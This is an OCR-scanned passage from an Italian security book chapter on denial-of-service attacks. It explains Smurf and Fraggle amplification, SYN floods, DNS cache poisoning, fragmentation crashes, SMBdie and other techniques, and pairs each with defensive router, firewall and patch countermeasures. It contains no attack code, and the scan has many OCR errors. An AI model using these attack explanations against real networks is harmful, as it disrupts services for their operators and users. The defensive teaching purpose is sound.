disposizione una larghezza di banda superiore. Un esempio tipico è l’attacco da 
una connessione T1 (1,544 Mbps), o più veloce, a un collegamento a 56 Kbps o 128 
Kbps. Proprio come nello scontro tra un TIR e un’utilitaria, ha la meglio il veicolo 
più grande, in questo caso il canale con portata maggiore. Questo tipo di attacco 
non è limitato alle connessioni di rete a bassa velocità. Abbiamo visto casi in cui gli 
hacker sono riusciti ad accedere a reti con più di 100 Mbps a disposizione, che han- 
no permesso loro di lanciare attacchi DoS contro siti dotati di connessioni T1, satu- 
randone completamente il collegamento in rete. 


Scenario 2 


L'hacker amplifica il proprio attacco DoS, impegnando diversi siti nell'operazione di 
intasamento della connessione in rete della vittima. Una persona con una misera con- 
nessione a 56 Kbps è in grado di saturare completamente una rete che dispone di un 
accesso T3 (45 Mbps). Come? Utilizzando altri siti per amplificare l'attacco, è facile 
mettere insieme 100 Mbps di larghezza di banda: il trucco consiste nel riuscire a con- 
vincere i sistemi di amplificazione a inviare traffico alla rete della vittima. Come vedre- 
mo più avanti nel capitolo, utilizzare tecniche di amplificazione non è poi così difficile. 
Ribadiamo inoltre che il traffico ICMP è pericoloso. Se da un lato ICMP ha una fon- 
damentale funzione diagnostica, dall’altro è fin troppo facile abusarne e farne un 
“proiettile” per attacchi di questo tipo, Un'aggravante degli attacchi con esaurimen- 
to della banda, è che la maggior parte degli hacker tende a contraffare il proprio in- 
dirizzo di partenza, rendendo difficile l’identificazione dell'effettivo responsabile. 


Esaurimento delle risorse 


Gli attacchi con esaurimento delle risorse (resource starvation) si differenziano da 
quelli con esaurimento della larghezza di banda, in quanto puntano al consumo delle 
risorse di sistema invece che di rete. In generale, questo si traduce nell'impiego di ri- 
sorse, come cicli della CPU, memoria, quote del file system, o altri processi di sistema. 
Spesso, gli hacker dispongono di un accesso “lecito” solo a una porzione limitata del- 
le risorse di sistema, ma riescono comunque ad abusarne in modo da consumare ul- 
teriori risorse; in questo modo il sistema o gli utenti legittimi sono privati delle risorse 
condivise. Generalmente, gli attacchi DoS lasciano le risorse inutilizzabili perché il si- 
stema va in crash, il file system si riempie e si arrestano alcuni processi. 


Difetti di programmazione 


I difetti di programmazione impediscono a un'applicazione, sistema operativo o 
chip logico integrato, di gestire condizioni eccezionali. Questi difetti normalmente 
si verificano quando un utente invia dati non previsti all'elemento vulnerabile. 
Spesso l’hacker invia al sistema target strani pacchetti non conformi alle RFC, per 
stabilire se lo stack di rete sia in grado di gestire tale eccezione o se, piuttosto, que- 
sta non generi il “panico” nel kernel, con conseguente crash del sistema, Nel caso di 
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particolari applicazioni che si aspettano input da parte dell'utente, l'hacker può in- 
viare stringhe di dati lunghe migliaia di righe. Se il programma utilizza un buffer a 
lunghezza fissa, per esempio 128 byte, questo può provocare un overflow del buf- 
fer € mandare in crash l'applicazione, con l'aggravanre che fhacker potrebbe ese- 
guire comandi privilegiati (si vedano i Capitoli 5 c 7). Si conoscono diversi casi di 
difetti di programmazione anche nei chip logici integrati. Il tristemente noto attacco 
foot ai Pentium consentiva a un processo utente di bloccare qualsiasi sistema opera- 
tivo eseguendo l'istruzione non valida 0xf00fc708. 

Tutti sanno che un programma e un processore, privi di errori, sono impensabili. 
Anche gli hacker se ne rendono conto è sfruttano a fondo il blocco di applicazioni 
critiche o sistemi essenziali. Sfortunatamente, attacchi di questo tipo si verificano 
sempre nel momento sbagliato. 


Attacchi a routing e DNS 


Un amacco Dos basaro sul routing consiste nella manipolazione da parte dell’hacker 
delle tabelle di instradamento, in modo da rifiutare il servizio a sistemi o network 
legittimi. La maggior parte dei protocolli di instradamento (outing), come RIP 
(Routing Mformution Protocol) v1 e BGP (Border Gateway Protocol) v4, prevede 
meccanismi di autenticazione molto deboli (o addirittura nov ne prevede alcuno) e, 
come se non bastasse, questi vengono raramente utilizzati in pratica: si tratta dello 
scenario ideale per un hacker che voglia modificare i percorsi validi, fornendo un 
indirizzo IP contraffatta per realizzare le condizioni di rifiuto del servizio. Le vittime 
di questo fipo di attacco vedranno il proprio traffico instradato sulla rete dell’hacker 
o in un buco nero, ossia una rete inesistente. 

Gli auacchi DoS ai DNS (Domain Name Server) sono altrettanto preoccupanti. La 
maggior parte degli attacchi DoS agisce in modo che il server target conservi infor- 
mazioni fasulle sugli indirizzi: in questo modo, quando il server DNS esegue una ri- 
cerca, l'hacker riesce a ridirigerlo su un sito predefinito oppure, in alcuni casi, su un 
buco nero. Sono passati alla storia numerosi attacchi DoS a server DNS, che hanno 
reso inaccessibili per parecchie ore siti di grandi dimensioni. 

Per comprendere meglio i) concetto di “avvelenamento” della cache DNS, osservate 
la Figura 12.1. 


Attacchi DoS generici 


Alcuni atacchi DoS sono in grado di colpire molti tipi di sistemi è per questo vengo- 
no detti generici. Generalmente, tali attacchi ricadono nelle categorie del consumo di 
larghezza di banda © di risorse. Un elemento comune è la manipolazione dei proto- 
colli: infatti, se utilizzato a fini nefasti, un protocollo come ICMP è in grado di colpire 
contemporaneamente diversi sistemi. Per esempio, l’hacker potrebbe utilizzare e-mail 
bomb per inviare migliaia cli messaggi di e-mail al sistema target, nel tentativo di con- 
sumare contemporaneamente la larghezza di banda e le risorse di sistema del server 
di posta. Il virus Melissa, in realtà un worm, non è nato come attacco DoS, ma ha si- 
curamente dimostrato come un'ondata di messaggi e-mail sia in grado di arrestare 
qualsiasi server di posta. Era talmente veloce a replicare enormi quantità di se stesso, 
da provocare l'arresto dei server di posta per mancanza di risorse. 

Non siamo in grado di rappresentare e affrontare tutte le condizioni plausibili di ri- 
fiuto del servizio, ma nel seguito del capitolo illustreremo gli attacchi DoS che rite- 
niamo più rilevanti per la maggior parte degli ambienti informatici. 
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PC client Server Web 
www.microsoft.com 


Server Web dell’aggressore 
www.hacker.com 


1) Il PC client chiede di accedere al sito Web di Microsoft, 
quindi il browser cerca di tradurre il nome www.microsoft.com 
nel corrispondente indirizzo IP. 

2) La cache del server DINS è stata “avvelenata” 
da un aggressore e restituisce l’indirizzo IP 
di www.hacker.com invece di quello di Microsoft. 

3) A questo punto, il sistema dell’aggressore si presenta spacciandosi 
per www.microsoft.com. 


Figura 12.1 
"Avvelenamento" della cache del server DNS. 


Smurf 


Diffusione: 9 
Semplicità: 8 
Impatto: 2 
Fattore di rischio: 6 


L'attacco Smurf è uno dei più temuti, a causa del suo effetto di amplificazione. Que- 
sto risulta dall'invio di una richiesta broadcast di ping a una rete di sistemi che ri- 
sponde a tali messaggi. Una richiesta di questo tipo può essere inviata all'indirizzo 
della rete, o a quello di broadcast della rete, e presuppone la presenza di un dispo- 
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sitivo che svolga funzionalità broadcast tra il livello 3 (IP) e 2 (rete). A questo pro- 
posito, si veda la RFC 1812, “Requirements for IP Version 4 Routers” (Requisiti per 
router IP versione 4). Se ipotizziamo che la rete utilizzi un sistema standard di allo- 
cazione degli inclirizzi cli classe C o a 24 bit, l'indirizzo di rete è .0, mentre quello di 
broadcast è .255. I broadcast indirizzati vengono utilizzati a fini diagnostici, per ve- 
rificare quali nodi siano attivi, senza effettuare esplicitamente il ping di ogni indiriz- 
zo nell'intervallo, 

Un attacco Smurf sfruita questo meccanismo e richiede la presenza di almeno tre 
soggetti: l'hacker, la rete di amplificazione e la vittima. L'hacker invia una serie di 
paccheri ICMP ECHO contraffatti all'indirizzo broadcast della rete di amplificazio- 
ne. L'indirizzo di origine dei pacchetti è falsificato, in modo che il sistema target ri- 
sulti come fonte della richiesta. A questo punto scoppia i finimondo: avendo rice- 
vuto il pacchetto ECHO all'indirizzo di broadcast, tutti i sistemi della rete di amplifi- 
cazione rispondono alla vittima (a meno che non siano configurati diversamente). 
Inviando un solo pacchetto ICMP a una rete di amplificazione contenente 100 siste- 
mi in graclo cli rispondere, l'hacker riesce a moltiplicare il suo attacco Do$ per 100. 
Definiamo fattore di amplificazione il rapporto tra il numero di pacchetti inviati e il 
numero cli sistemi che rispondono. Quindi, se riesce a trovare una rete con un fatto- 
re di amplificazione elevato, l'hacker ha una maggiore probabilità di saturare la rete 
della vittima. 

Vediamo un esempio pratico: immaginate che l’hacker riesca a inviare con continui 
tà un traffico ICMP di 14 K all’indirizzo di broadcast di una rete cli amplificazione 
contenente 100 sistemi. La rete dell'hacker è collegata a Internet attraverso una con- 
nessione ISDN 4 due canali, quella di amplificazione mediante un canale T3 a 45 
Mbps, mentre quella della vittima mediante un collegamento T'1 a 1,544 Mbps. Fa- 
cendo due semplici conti, si scopre che l’hacker è in grado di generare 14 Mbps di 
traffico da inviare alla rete della vittima, che ha pochissime probabilità di resistere 
all'attacco poiché vedrà rapidamente consumarsi tutta la larghezza dii banda del col- 
legamento T1. 

Una variante di questo tipo di attacco è detta “Fraggle" e utilizza UDP al posto di 
ICMP. L'hacker invia all'indirizzo di broadcast della rece di amplificazione pacchetti 
UDP contraffatti, tipicamente sulla porta 7 (echo). Tutti i sistemi della rete su cui sia 
abilitata l’echo, rispondono all’host della vittima, generando un'enorme quantità di 
traffico. Se su alcuni sistemi della rete di amplificazione la porta echo è disattivata, 
viene comunque generato un messaggio ICMP non raggiungibile, che consuma lar- 
ghezza di banda. 


° Contromisure a Smurf 


Per evitare di essere utilizzati come amplificatore, sarebbe bene disattivare sul rou- 
ter esterno le funzionalità di directed broadcast. Nel caso dei router Cisco, si utilizza 
il Comando: 


no ip directed-broadcast 


questo comando disabilita Ja funzionalità di direct broadcast. Nelle versioni di Cisco 
IOS a partire dalla 12, questa funzionalità è attiva per default, Nel caso di altri dispo- 
sitivi, vi rimandiamo alla retativa documentazione. 

Inoltre, alcuni sistemi operativi prevedono la possibilità cli scartare senza risposta i 
pacchetti ICMP ECHO broadcast. 
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Solaris 2.6, 2.5.1, 2.5,2.4 e 2.3 


Per impedire ai sistemi Solaris di rispondere alle richieste broadcast di ECHO è suf- 
ficiente aggiungere la seguente riga di codice al file /etc/rc2.d/S69inet: 


ndd -set /dev/ip ip_respond_to_echo_broadcast @ 


Linux 


Per impedire ai sistemi Linux di rispondere alle richieste broadcast di ECHO, è pos- 
sibile attivare il firewall a livello di kernel utilizzando ipfw. I pacchetti dei firewall 
variano secondo la versione del kernel: ipchains e iptable sono comunque i più co- 
muni. Per maggiori informazioni sulla configurazione di questi pacchetti, visitate il 
sito http://www.redhat.com/support/resources/networking/firewall.html. 
Con iptable si possono usare i seguenti comandi: 


iptables -A INPUT -p icmp -d 192.168.1.1/32 -j DROP 
iptables -A FORWARD -p icmp -d 192.168.100.255/24 -j DROP 


Il primo comando avrà l’effetto di non trasmettere i messaggi ICMP inviati allo stes- 
so host (in questo caso 192.168.1.1). Il secondo comando impone al sistema di non 
inviare richieste ECHO broadcast sulla rete interna, se il sistema viene utilizzato 
come firewall o router. 


FreeBSD 


Le versioni di FreeBSD a partire dalla 2.2.5 disattivano, di default, i directed broad- 
cast. In ogni caso, per attivare e disattivare questa funzionalità è necessario modifi- 
care il parametro net.inet.icmp.bmcastecho di sysctl. 


AIX 


AIX 4.x disattiva di default le risposte a indirizzi broadcast. Il comando no permette 
di attivare e disattivare questa funzionalità mediante l'impostazione dell'attributo 
bcastping e consente di configurare gli attributi di rete del kernel in esecuzione; 
pertanto deve essere eseguito a ogni riavvio del sistema. 


Tutte le varianti UNIX 


Per impedire agli host di rispondere all’attacco Fraggle, disattivate echo e chargen in 
letc/inetd/conf anteponendo al nome del servizio il simbolo del cancelletto (#). 


Durante l’attacco 


Se è importante impedire che il proprio sito venga utilizzato come amplificatore, è 
essenziale comprendere come intervenire se questo diventa oggetto di un attacco. 
Come già detto nei precedenti capitoli, sarebbe bene limitare il traffico ICMP e UDP 
in ingresso ai router periferici a quei sistemi della rete sui quali è necessario, e solo 
ad alcuni tipi ICMP. Certamente, questo non può impedire agli attacchi Smurf e Frag- 
gle di esaurire la vostra larghezza di banda. Vi consigliamo di consultare il vostro ISP 
per tenere la maggior parte del traffico ICMP il più lontano possibile. Per rafforzare 
queste contromisure, alcune organizzazioni hanno attivato la funzionalità CAR 
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(Committed Access Rate) presente nelle versioni di Cisco IOS 1.1CC, 11.1CE e 12.0, 
che permette di limitare il traffico ICMP a livelli ragionevoli, come 256 K o 512 K. 

In caso di attacco, per prima cosa occorre contattare il centro operativo di rete NOC 
(Network Operations Center) del proprio ISP. Ricordate che risalire al responsabile 
dell’attacco è difficile, ma è comunque possibile. Voi e il vostro ISP dovrete collabo- 
rare strettamente con il sito di amplificazione che riceve i pacchetti contraffatti. Se il 
vostro sito è sotto attacco, i pacchetti risulteranno provenire dal sito usato come am- 
plificatore, che vedrà come provenienti dalla vostra rete i pacchetti ottenuti 
dall'operazione di spoofing. 

Esaminando sistematicamente tutti i router a partire dal sito amplificatore e risalen- 
do a quelli precedenti, è possibile ricostruire il percorso dell’attacco fino alla rete di 
origine: si comincia con lo stabilire su quale interfaccia è stato ricevuto il pacchetto 
contraffatto, quindi si risale al nodo precedente. Per semplificare questo processo, il 
gruppo della sicurezza di MCI ha sviluppato uno script perl chiamato “dostracker” 
in grado di connettersi a un router Cisco e ricostruire il percorso di un attacco con- 
traffatto fino all'origine. Sfortunatamente, questo programma risulta di scarsa utilità 
se non si controllano o non si può accedere a tutti i router coinvolti. 

Vi consigliamo di consultare la RFC 2267, “Network Ingress Filtering: Defeating De- 
nial of Service Attacks Which Employ IP Source Address Spoofing” di Paul Ferguson 
della Cisco Systems e Daniel Senie di Blazenet Inc. 


® SYN Flood 

Diffusione: 7 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 8 


Fino all'affermazione degli attacchi Smurf, i SYN Flood (inondazione SYN) sono stati 
gli attacchi DoS più devastanti. L'attacco a PANIX, ricordato all’inizio di questo capito- 
lo, è stato un esempio emblematico delle potenzialità distruttive di un SYN Flood ben 
organizzato. Vediamo cosa succede esattamente durante un attacco di questo tipo. 
Come abbiamo già detto, l'apertura di una connessione TCP è un processo in tre fa- 
si, come mostrato nella Figura 12.2. 


Handshake TCP in tre fasi 


1) Invio di SYN da parte del client 


2) Invio di SYN/ACK da parte del server 
e ______—— 1 


3) Invio di ACK da parte del client 
Client TT TI Server 


Figura 12.2 
Una connessione SYN. 
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In circostanze normali, viene inviato un pacchetto SYN da una specifica porta del 
sistema A a una specifica porta in ascolto (stato LISTEN) sul sistema B. A questo 
punto, la potenziale connessione si trova in uno stato SYN_RECV sul sistema B, e 
questo prova a reinviare un pacchetto SYN/ACK al sistema A. Se tutto va bene, il si- 
stema A restituisce un pacchetto ACK e la connessione passa in stato ESTA- 
BLISHED. 

Questo meccanismo, che funziona egregiamente la maggior parte dei casi, presenta 
tuttavia punti deboli che possono essere sfruttati da un hacker per realizzare una si- 
tuazione di rifiuto del servizio. Il problema è legato al fatto che la maggior parte dei 
sistemi alloca una quantità limitata di risorse per l’impostazione di una connessione 
potenziale, ossia una connessione non completamente stabilita. Molti sistemi sono 
in grado di supportare migliaia di connessioni concomitanti a una specifica porta 
(per esempio, la 80), ma può bastare una decina di richieste di potenziali connes- 
sioni per esaurire tutte le risorse assegnate alla realizzazione dei collegamenti. Il 
meccanismo sfruttato negli attacchi di tipo SYN per disattivare un sistema è esatta- 
mente questo. 

All’inizio di un attacco SYN Flood, l'hacker invia un pacchetto SYN dal sistema A al 
sistema B, sostituendo l’indirizzo di partenza con quello di un sistema inesistente. Il 
sistema B, allora, cerca di inviare un pacchetto SYN/ACK all'indirizzo finto: se que- 
sto esiste, normalmente dovrebbe rispondere al sistema B con un pacchetto RST, in 
quanto non ha richiesto di aprire una connessione. Ricordate, però, che l’hacker ha 
specificato un sistema non raggiungibile, quindi il sistema B non riceverà mai il pac- 
chetto RST in risposta al proprio SYN/ACK. La connessione potenziale, dunque, si 
trova in uno stato SYN_RECV e viene posta in una coda di connessione, Il sistema è 
intenzionato a stabilire il collegamento e la connessione potenziale verrà eliminata 
dalla coda solo una volta trascorso un certo intervallo di tempo. La durata di questo 
intervallo varia da sistema a sistema e può andare da 75 secondi a 23 minuti nel 
caso di implementazioni infelici di IP. Poiché la coda di connessione è normalmen- 
te piuttosto corta, all'hacker potrebbe bastare inviare qualche pacchetto SYN ogni 
10 secondi per disattivare completamente una specifica porta, in quanto il sistema 
attaccato non riuscirà mai a esaurire le richieste pendenti prima di ricevere quelle 
nuove. 

Probabilmente avete già intuito cosa rende questo attacco tanto devastante. In- 
nanzitutto, per avviare un SYN Flood efficace è necessaria una larghezza di ban- 
da estremamente ridotta. Un hacker con una misera connessione via modem a 
14,4 Kbps è in grado di mettere in ginocchio un server di dimensioni industriali. 
Inoltre, è un attacco “coperto”, perché l’hacker falsifica l'indirizzo di partenza del 
pacchetto SYN, rendendo difficile l'identificazione del responsabile, Questo tipo 
di attacco è stato ipotizzato per anni da molti esperti di sicurezza ed è funzionale 
allo sfruttamento delle relazioni di fiducia (si veda http://www.phrack.org/ 
show.php?p= 48&a=14). 


Contromisure all’attacco SYN Flood 


Per stabilire se siete sotto attacco, potete lanciare il comando netstat-na, qualora 
sia previsto dal vostro sistema operativo. Se molte connessioni risultano essere nel- 
lo stato SYN_RECV, questo potrebbe indicare che è in corso un attacco SYN. 

Di seguito, sono delineate quattro strategie di base per affrontare gli attacchi di tipo 
SYN Flood. Ogni rimedio presenta pro e contro, ma consente di ridurre gli effetti di 
attacchi SYN focalizzati. Ricordate che non è facile risalire al responsabile dell’attac- 
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co, perché l'indirizzo di partenza dei pacchetti è contraffatto; tuttavia, il programma 
dostracker di MCI potrebbe risultare utile (ma richiede l'accesso a tutti i router inter- 
medi sul percorso), 


Aumento delle dimensioni della coda di connessione 


Le implementazioni dello stack IP differiscono leggermente a seconda del produtto- 
re, ma in generale dovrebbe essere possibile regolare la dimensione della coda di 
connessione per ridurre gli effetti di attacchi SYN Flood. È un rimedio utile, ma cer- 
to non rappresenta la soluzione ideale, in quanto impegna ulteriori risorse di siste- 
ma e potrebbe influenzare negativamente le prestazioni. 


Riduzione della durata del periodo di realizzazione della connessione 


Anche la riduzione della durata del periodo di realizzazione della connessione può 
contribuire a ridurre l’efficacia di un attacco SYN, ma non è comunque la soluzione 
ideale. 


Applicazione di patch software dei produttori 
per intercettare e annullare potenziali attacchi SYN 


La maggior parte dei moderni sistemi operativi implementa meccanismi di intercet- 
tazione e prevenzione di attacchi SYN Flood. Il documento CERT CA-96:21, “TCP 
SYN Flooding and IP Spoofing Attacks”, contiene un elenco dei rimedi e delle patch 
per diversi sistemi operativi, 

Da quando gli attacchi SYN hanno iniziato a diffondersi sulla Rete sono state 
ideate nuove soluzioni per gestire le condizioni di Denial of Service. Per esem- 
pio, le versioni del kernel di Linux a partire dalla 2.0.30 implementano l'opzione 
SYN cookie: se viene attivata, il kernel intercetta e registra tutti i possibili attacchi 
SYN e utilizza un protocollo di challenge cifrato, detto appunto “SYN cookie”, 
per consentire agli utenti autorizzati di continuare a collegarsi, anche in presen- 
za di attacchi pesanti. 

Altri sistemi operativi, come Windows NT 4.0 SP2 e superiori, utilizzano code di- 
namiche (si veda l'articolo Q142641 della Microsoft Knowledge Base). Se la lun- 
ghezza della coda di connessione supera un certo limite prestabilito, il sistema al- 
loca automaticamente risorse aggiuntive. In questo modo, la coda di connessione 
non viene mai saturata. 


Utilizzo di IDS di rete 


Esistono prodotti di IDS per reti, in grado di riconoscere e reagire ad attacchi 
SYN. Un attacco SYN è riconoscibile per l’arrivo di numerosi pacchetti SYN sen- 
za le relative risposte. Un IDS può inviare al sistema sotto attacco i pacchetti RST 
corrispondenti alle richieste SYN iniziali, aiutandolo ad alleggerire la coda di 
connessione. 
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O Attacchi al DNS 


Diffusione: 6 
Semplicità: 4 
Impatto: 9 
Fattore di rischio: 6 


Nel 1997, le versioni di BIND precedenti alla 4.9.5+P1 conservavano nella cache in- 
formazioni false se era impostata la ricorsività del DNS. La ricorsività permette a un 
name server di gestire le richieste riguardanti zone o domini che non copre diretta- 
mente: quando riceve un’interrogazione su una zona o dominio non di sua compe- 
tenza, il server la trasmette al server di riferimento per il dominio specifico. Una vol- 
ta ricevuta la risposta, il server la restituisce al richiedente. 

Sfortunatamente, se il processo ricorsivo viene attivato su una versione vulnerabile 
di BIND, un hacker è in grado di “avvelenare” la cache del server dei nomi che et- 
fettua la ricerca ricorsiva: in questo caso, si parla di contraffazione di record PTR 
(PTR record spoofing) e la tecnica sfrutta il processo di mappatura degli indirizzi IP 
su nomi host. Il fenomeno presenta notevoli implicazioni a livello di sfruttamento 
delle relazioni di fiducia basate sulla ricerca dei nomi host, ma apre anche la porta a 
possibili attacchi DoS basati su DNS. Per esempio, l'hacker potrebbe cercare di con- 
vincere il server dei nomi a registrare l'associazione tra ww. example.com e 0.0.0.10, 
un indirizzo IP inesistente: quando gli utenti del name server vulnerabile chiederan- 
no di accedere a ww. example.com, non riceveranno alcuna risposta da 0.0.0.10 e si 
realizzerà una situazione di rifiuto del servizio per ww.example.com. 


Contromisure per il DNS 


Per eliminare i problemi rilevati, aggiornate BIND almeno alla versione 4.9.6 0 8.1.1 
e seguenti. Queste versioni di BIND correggono i problemi legati alla contaminazio- 
ne della cache, ma vi consigliamo di utilizzare la versione più recente disponibile di 
BIND, che implementa ulteriori correzioni alla gestione della sicurezza. Per maggio- 
ri informazioni, vi rimandiamo all'indirizzo http://ww.isc.org/bind.html. Tro- 
vate indicazioni su patch disponibili per prodotti specifici nel documento CERT CA- 
97.22, “BIND - the Berkeley Internet Name Daemon”. 


Denial of Service in UNIX e Windows 


Nel corso degli ultimi venticinque anni UNIX è diventato famoso per la potenza, l’ele- 
ganza e per la capacità di svolgere operazioni a volte inconcepibili. Ovviamente, in- 
sieme con la versatilità troviamo maggiori rischi, poiché si aprono molte strade di at- 
tacco al sistema. Nel corso degli anni sono state rilevate centinaia di situazioni di rifiu- 
to del servizio nelle numerose varianti di UNIX. 

Analogamente a UNIX, Windows di Microsoft ha conosciuto un periodo di crescita 
esponenziale della popolarità, soprattutto in ambito aziendale. Numerose organiz- 
zazioni, nel corso del XXI secolo, hanno affidato le proprie sorti ai sistemi operativi 
Windows. Molti puristi discutono animatamente su quale sistema operativo sia più 
potente, ma è innegabile che Windows sia un sistema complesso e dotato di nume- 
rose funzionalità. Come nel caso di UNIX, per gli hacker questa ricchezza rappre- 
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senta anche l’opportunità di sfruttare situazioni di rifiuto del servizio all’interno del 
sistema operativo Windows e delle relative applicazioni. 

La maggior parte degli attacchi DoS può essere suddivisa tra situazioni di rifiuto del 
servizio locali e remote. Per ogni categoria esistono numerose situazioni possibili; 
per questo motivo, non ci dilungheremo inutilmente sulle singole tecniche di attac- 
co, ma ci soffermeremo su esempi significativi in grado di illustrare la teoria sotto- 
stante: le caratteristiche degli attacchi cambieranno nel tempo, ma se riuscirete a 
comprendere le basi teoriche dei diversi tipi di attacco, potrete facilmente trovare 
una soluzione anche per le nuove tecniche. Passiamo quindi a illustrare alcune del- 
le principali situazioni Do$ in ciascuna categoria. 


Attacchi DoS remoti 


Attualmente, la maggior parte delle situazioni di Denial of Service è legata a difetti 
di programmazione all’interno della specifica implementazione dello stack IP da 
parte di un certo produttore, Come abbiamo visto nel Capitolo 2, ogni produttore 
implementa una propria versione dello stack IP: è per questo motivo che il finger- 
printing dello stack è così efficace. Poiché le implementazioni di IP sono complesse 
e in continua evoluzione, è prevedibile che si presentino errori di programmazione. 
La tecnica di base, applicata in quasi tutti questi attacchi, consiste nell’inviare un 
particolare pacchetto o una sequenza di pacchetti al sistema target, allo scopo di 
sfruttare difetti specifici di programmazione. Quando il sistema target riceve tali 
pacchetti, il risultato può andare dall'elaborazione non corretta dei dati al crash 
dell'intero sistema. 


® Ricostruzione dei pacchetti IP frammentati 
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Gli attacchi teardrop (lacrima) e simili sfruttano i punti deboli nel codice per la ri- 
composizione dei pacchetti, presenti nelle diverse implementazioni dello stack IP. 
Quando i pacchetti attraversano reti diverse, potrebbe essere necessario suddivider- 
li in parti più piccole (frammenti), in funzione dell'unità massima di trasmissione 
delle reti (MTU, Maximum Transmission Unit). L'attacco teardrop era orientato ai 
vecchi kernel Linux, che non gestivano correttamente la sovrapposizione dei fram- 
menti IP; infatti, mentre il kernel effettuava controlli di congruenza sulla dimensio- 
ne di frammentazione, se questa era elevata, non effettuava alcuna validazione se il 
valore era basso. Di conseguenza, pacchetti realizzati ad hoc e inviati a sistemi Li- 
nux vulnerabili erano in grado di provocare un riavvio o un arresto del sistema. Tut- 
tavia, Linux non era l’unico sistema operativo esposto a questi attacchi, Windows 
NT/95 era infatti nelle stesse condizioni: per questo motivo sono nate diverse va- 
rianti di questo attacco (newtear.c, syndrop.c e boink.c). 
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Contromisure per la ricostruzione dei pacchetti IP 


Queste possibilità di attacco sono state eliminate nelle versioni successive dei ker- 
nel 2.0.X e 2.2.X. Aggiornando il kernel alla versione 2.0.X o 2.2.X più recente, oltre 
all'eliminazione dei problemi con la frammentazione IP, otterrete una serie di corre- 
zioni a problemi di gestione della sicurezza. 

Per sistemi Windows, i problemi con la frammentazione IP sono stati affrontati in al- 
cuni fix successivi al Service Pack 3 per Windows NT. Consigliamo vivamente agli 
utenti di Windows NT di installare il service pack più recente, che contiene corre- 
zioni a problemi di sicurezza. Anche gli utenti di Windows 95 dovrebbero installare 
tutti gli ultimi aggiornamenti. 


CD) SMBdie 
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Le versioni RC1 di Windows NT/2000/XP/.NET sono tutte vulnerabili a un attacco di 
tipo Do$ molto comune, rilasciato nel 2002, noto con il nome (molto appropriato) 
di SMBdie: la versione 0.1 di questo programma fa sì che un indirizzo IP e il nome 
NetBIOS a esso associato inviino un messaggio che causa il blocco del sistema. Sor- 
tendo un effetto analogo a quello provocato dagli attacchi sui vecchi sistemi Win- 
dows, che tutti speravamo di poter dimenticare per sempre, SMBdie, sfruttando un 
punto debole dell’implementazione di Microsoft del protocollo TCP/IP, provoca 
l'apparizione della tanto temuta schermata blu di Windows, che rende il sistema 
completamente inutilizzabile costringendo l’utente al riavvio della macchina. 


Contromisure a SMBdie 


La sola contromisura conosciuta per questo attacco è l’installazione dell'apposita 
patch di Microsoft, che potete scaricare dal sito windowsupdate.microsoft.com, o 
di bloccare l’accesso alle porte NetBIOS per il protocollo TCP/IP (139 e 145). 


® Memory leak dello spool di Windows NT 
e pipe con nome su RPC 
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Windows NT presenta un memory leak in spoolss.exe, che consente a utenti non 
autorizzati di collegarsi a \server\PIPE\SPOOLSS e consumare tutta la memoria di- 
sponibile sul sistema target. La situazione è ancora più grave perché questo tipo di 
attacco può essere lanciato da una sessione nulla, anche qualora sia attivata la limi- 
tazione delle connessioni anonime (RestrictAnonymous). Questo attacco può im- 
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piegare qualche tempo prima di disattivare completamente il sistema target e dimo- 
stra che le risorse possono essere esaurite lentamente, ossia in un periodo sufficien- 
temente lungo da impedire il riconoscimento. 


© Contromisure al leak dello spool di Windows NT 


Per disattivare questo tipo di attacco da una sessione nulla, è necessario elimi- 
nare la voce SPOOLSS dalla chiave del Registro: HKLM\System\CCS\Services\ 
LanmanServer\Parameters\NullSessionPipes(REG_MULTI_ SZ). Ricordate che 
questo rimedio non impedisce a utenti autenticati di portare a segno lo stesso 
tipo di attacco. 


® 
® Attacchi DoS con buffer overflow al server FTP di IIS 


Diffusione: 
Semplicità: 
Impatto: 

Fattore di rischio: 
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Come abbiamo già visto nel Capitolo 7, gli attacchi con buffer overflow possono es- 
sere molto efficaci nel compromettere la sicurezza di sistemi vulnerabili. Oltre alle 
notevoli implicazioni a livello di sicurezza, le situazioni di buffer overflow contribui- 
scono a realizzare condizioni di rifiuto del servizio, Se la condizione di overflow del 
buffer non garantisce l’accesso come superutente, spesso può mandare in crash 
un'applicazione vulnerabile da remoto. 

Il server FIP di IIS ([mternet Information Server, versioni 3.0 e 4.0) è esposto a una 
situazione di overflow del buffer che si realizza mediante il comando list e che 
potrebbe consentire a hacker remoti di causare l'arresto del server. Il comando list 
dovrebbe essere disponibile solo a utenti autenticati; invece, risulta accessibile an- 
che a utenti FTP anonimi. È importante notare che il fattore di rischio di questa tec- 
nica riflette esclusivamente la situazione di rifiuto del servizio: il valore sarebbe no- 
tevolmente più alto se, a seguito della condizione di overflow del buffer, l’utente 
riuscisse a eseguire un codice arbitrario sul sistema target. 


Contromisure agli attacchi Dos al server FTP di IIS 


Il Service Pack 5 di Microsoft e alcuni hotfix successivi al Service Pack 4 affrontano 
questo problema in Windows NT 4.0. 


® Attacchi stream e raped 


Diffusione: 5 
Semplicità: 6 
Impatto: 9 
Fattore di rischio: p 


Stream.c (scritto da un autore sconosciuto) e raped.c di Liquid Steel hanno visto 
la luce all’inizio del 2000. Gli attacchi sono semplici, tra loro simili e piuttosto 
efficaci. 
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Entrambi ricadono nella categoria degli attacchi per esaurimento delle risorse e 
sfruttano l'incapacità del sistema operativo di gestire tutti i pacchetti alterati che gli 
vengono inviati contemporaneamente, Concepito originariamente per essere un at- 
tacco diretto solo a sistemi FreeBSD, sia stream che raped sono oggi in grado di 
mettere a dura prova molti sistemi operativi, tra cui anche Windows NT. Il sintomo 
dell'attacco è un elevato utilizzo della CPU (si veda la figura seguente), ma quando 
l'attacco cessa il sistema torna alla normalità. L'attacco stream.c si basa sull’invio a 
una serie di porte di pacchetti TCP ACK contrassegnati da numeri di sequenza e in- 
dirizzi IP di origine casuali. L'attacco raped.c si basa sull’invio di pacchetti TCP ACK 
con indirizzi IP contraffatti. 


Contromisure agli attacchi stream e raped 


Sfortunatamente pochi sistemi operativi mettono a disposizione le patch per questi at- 
tacchi. Non siamo a conoscenza di hotfix per Windows NT, Per FreeBSD è possibile ap- 
plicare la patch non ufficiale (http://ww.freebsd.org/-alfred/tcp_ fix.diff). 


C) Attacco all’applicazione Administrator di ColdFusion 


Diffusione: Z 
Semplicità: 8 
Impatto: 9 
Fattore di rischio: 8 


Scoperta da Foundstone nel giugno del 2000, questa vulnerabilità sfrutta un punto 
debole nell’architettura del software per provocare il crash del server. Il rifiuto del 
